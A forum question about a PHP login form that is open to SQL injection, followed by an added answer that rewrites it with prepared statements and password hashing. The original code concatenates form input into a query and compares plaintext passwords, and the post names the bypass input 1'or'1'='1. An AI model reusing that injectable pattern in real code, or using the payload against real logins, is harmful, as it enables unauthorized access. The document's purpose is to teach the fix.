Prevent from SQL Injection
Posted: Thu Dec 10, 2015 12:28 am
Hi, I'm new to PHP. I have tried a simple login form; in that form everything is okay, but it's vulnerable to a simple SQL injection attack - 1'or'1'='1 .
To prevent this I have added some simple code to the login form. It's working fine but shows an error. How do I clear that? Please help me. Below is my code.
It shows an error in line 8.
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in login.php on line 8
Code:
<?php
session_start();
$message = "";
if (count($_POST) > 0) {
    $conn = mysql_connect("localhost", "root", "");
    mysql_select_db("test", $conn);
    // Form input is concatenated straight into the SQL text (this is where the
    // 1'or'1'='1 injection comes from). mysql_query() returns FALSE when the query
    // fails, and that FALSE is what mysql_fetch_array() on the next line complains about.
    $result = mysql_query("SELECT * FROM users WHERE user_name='" . $_POST["user_name"] . "' and password = '" . $_POST["password"] . "'");
    $row = mysql_fetch_array($result);
    if (is_array($row)) {
        // Array keys must be quoted strings; a bare user_id is an undefined constant.
        $_SESSION["user_id"] = $row["user_id"];
        $_SESSION["user_name"] = $row["user_name"];
    } else {
        $message = "Invalid Username or Password!";
    }
}
if (isset($_SESSION["user_id"])) {
    header("Location: user_dashboard.php");
    exit; // stop rendering the form once the redirect header is sent
}
?>
<html>
<head>
<title>Login Page</title>
<link rel="stylesheet" type="text/css" href="styles.css" />
</head>
<body>
<form name="frmUser" method="post" action="">
<table border="0" cellpadding="10" cellspacing="1" width="500" align="center">
<tr class="tableheader">
<td align="center" colspan="2">Enter Login Details</td>
</tr>
<tr class="tablerow">
<td align="right">Username</td>
<td><input type="text" name="user_name"></td>
</tr>
<tr class="tablerow">
<td align="right">Password</td>
<td><input type="password" name="password"></td>
</tr>
<tr class="tableheader">
<td align="center" colspan="2"><input type="submit" name="submit" value="Submit"></td>
</tr>
<tr>
<td colspan="2"><div class="message"><?php if ($message != "") { echo $message; } ?></div></td>
</tr>
</table>
</form>
</body>
</html>
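The warning in the post is the symptom of a query that failed: mysql_query() returns FALSE on error and the code hands that FALSE to mysql_fetch_array(). The injection and the warning share one fix, which is to stop splicing form input into SQL text. The following is an added example, not the poster's code, showing the same login rewritten with mysqli prepared statements and hashed passwords. It assumes a table `users` with columns user_id, user_name and password_hash (a value produced by password_hash() when the account was created); the host, database user and database password are placeholders.

```php
<?php
// Added example, not the poster's code: the login form using mysqli prepared
// statements so form input is bound as a parameter and can never alter the SQL.
// Assumed schema: table `users` with columns user_id, user_name, password_hash.
// Connection details below are placeholders.
session_start();
$message = "";

// Make mysqli throw on failure instead of returning FALSE. A silent FALSE is the
// root cause of the "expects parameter 1 to be resource, boolean given" warning.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Returns the user row on success, or null when the credentials do not match.
function authenticate(mysqli $conn, string $userName, string $password): ?array
{
    // The "?" placeholder is sent to MySQL separately from the value, so an input
    // such as 1'or'1'='1 is compared literally as a user name and matches nothing.
    $stmt = $conn->prepare(
        "SELECT user_id, user_name, password_hash FROM users WHERE user_name = ?"
    );
    $stmt->bind_param("s", $userName);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Compare against the stored hash, never against a plaintext password column.
    if ($row === null || !password_verify($password, $row["password_hash"])) {
        return null;
    }
    unset($row["password_hash"]);
    return $row;
}

if ($_SERVER["REQUEST_METHOD"] === "POST") {
    try {
        $conn = new mysqli("localhost", "DB_USER_PLACEHOLDER", "DB_PASSWORD_PLACEHOLDER", "test");
        $user = authenticate(
            $conn,
            (string)($_POST["user_name"] ?? ""),
            (string)($_POST["password"] ?? "")
        );
        $conn->close();
    } catch (mysqli_sql_exception $e) {
        // Log the real cause server-side; the user only sees a generic message.
        error_log("login query failed: " . $e->getMessage());
        $user = null;
    }

    if ($user !== null) {
        session_regenerate_id(true); // fresh session id once the user is authenticated
        $_SESSION["user_id"] = $user["user_id"];
        $_SESSION["user_name"] = $user["user_name"];
        header("Location: user_dashboard.php");
        exit;
    }
    $message = "Invalid Username or Password!";
}
?>
<html>
<head><title>Login Page</title></head>
<body>
<form name="frmUser" method="post" action="">
  Username <input type="text" name="user_name">
  Password <input type="password" name="password">
  <input type="submit" name="submit" value="Submit">
  <div class="message"><?php echo htmlspecialchars($message, ENT_QUOTES, "UTF-8"); ?></div>
</form>
</body>
</html>
```

Two notes on the design: `get_result()` needs the mysqlnd driver (use bind_result() otherwise), and the mysql_* functions used in the post were removed in PHP 7, so moving to mysqli or PDO is required for any current PHP anyway. The one remaining step is to store passwords with password_hash() when accounts are created, so the password_verify() check above has a hash to compare against.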